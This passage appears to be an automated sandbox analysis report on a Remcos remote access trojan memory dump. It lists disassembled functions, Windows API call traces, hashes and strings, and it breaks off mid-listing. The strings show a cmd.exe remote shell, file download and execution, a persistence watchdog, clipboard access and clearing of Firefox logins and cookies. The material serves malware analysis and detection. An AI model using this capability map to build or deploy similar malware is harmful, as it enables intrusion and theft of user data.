String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
TerminateProcess.KERNEL32(00000000), ref: 004432DD
ExitProcess.KERNEL32 ref: 004432EF

Strings

PkGNG, xrefs: 004432B7

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: PkGNG
API String ID: 1703294689-263838557
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

PG, xrefs: 0040F0D8
del, xrefs: 0040F2ED, 0040F36F
dMG, xrefs: 0040F1A8
licence, xrefs: 0040EF88
PG, xrefs: 0040EA96
PG, xrefs: 0040EDD3
PG, xrefs: 0040EF66
PG, xrefs: 0040F1F3
PG, xrefs: 0040ED47
Exe, xrefs: 0040EB0F
8SG, xrefs: 0040EF1D
PG, xrefs: 0040F12B
PG, xrefs: 0040EA5D
Administrator, xrefs: 0040F287
PG, xrefs: 0040EEAC
PSG, xrefs: 0040F224
PG, xrefs: 0040F036
license_code.txt, xrefs: 0040EA4D
PG, xrefs: 0040ED7B
SG, xrefs: 0040EB05
Access Level: , xrefs: 0040F29F
PG, xrefs: 0040F154
8SG, xrefs: 0040EE65
Software\, xrefs: 0040EAC3
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 0040E9E6, 0040EE0F
SG, xrefs: 0040EB62
PG, xrefs: 0040F103
del, xrefs: 0040F2D1
User, xrefs: 0040F28E
Remcos Agent initialized, xrefs: 0040EFEF
PG, xrefs: 0040F1C7
PG, xrefs: 0040F187
Inj, xrefs: 0040EBD5, 0040EBEC
exepath, xrefs: 0040EE92, 0040EF40

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-2501106381
Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
SetEvent.KERNEL32(?), ref: 00404E43
FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
closesocket.WS2_32(?), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
SetEvent.KERNEL32(?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
SetEvent.KERNEL32(?), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Strings

PkGNG, xrefs: 00404E28

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID: PkGNG
API String ID: 2403171778-263838557
Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Strings

XPG, xrefs: 00407DED
XPG, xrefs: 004082E7
(PG, xrefs: 004081F2
XPG, xrefs: 00408718
Downloaded file: , xrefs: 0040802E
open, xrefs: 00408191
Unable to rename file!, xrefs: 00408413
Executing file: , xrefs: 004081AD
Downloading file: , xrefs: 00407F7D
Browsing directory: , xrefs: 00408238
Deleted file: , xrefs: 00407DC8
Failed to download file: , xrefs: 004080A5
Unable to delete: , xrefs: 00407E07
XPG, xrefs: 00408430
NG, xrefs: 00407CE5

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 0040585A
SystemDrive, xrefs: 00405761
0lG, xrefs: 00405988
0lG, xrefs: 00405954
0lG, xrefs: 00405A2D
kG, xrefs: 004057DB
cmd.exe, xrefs: 0040574D
0lG, xrefs: 004056D0

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

svchost.exe, xrefs: 004122C5
WDH, xrefs: 004121B5, 004121BB, 00412420
rmclient.exe, xrefs: 004122EA
WinDir, xrefs: 0041221B, 00412270
\system32\, xrefs: 00412209
Watchdog launch failed!, xrefs: 00412383
\SysWOW64\, xrefs: 00412261
Remcos restarted by watchdog!, xrefs: 00412160
Watchdog module activated, xrefs: 00412184, 004123DC
fsutil.exe, xrefs: 0041230F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
[Firefox StoredLogins not found], xrefs: 0040BBD4
\logins.json, xrefs: 0040BC34
\key3.db, xrefs: 0040BC76
UserProfile, xrefs: 0040BB60

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32(00000000), ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32(0000000D,00000000), ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
[Firefox cookies found, cleared!], xrefs: 0040BEDF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
\cookies.sqlite, xrefs: 0040BE2C
UserProfile, xrefs: 0040BD60

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

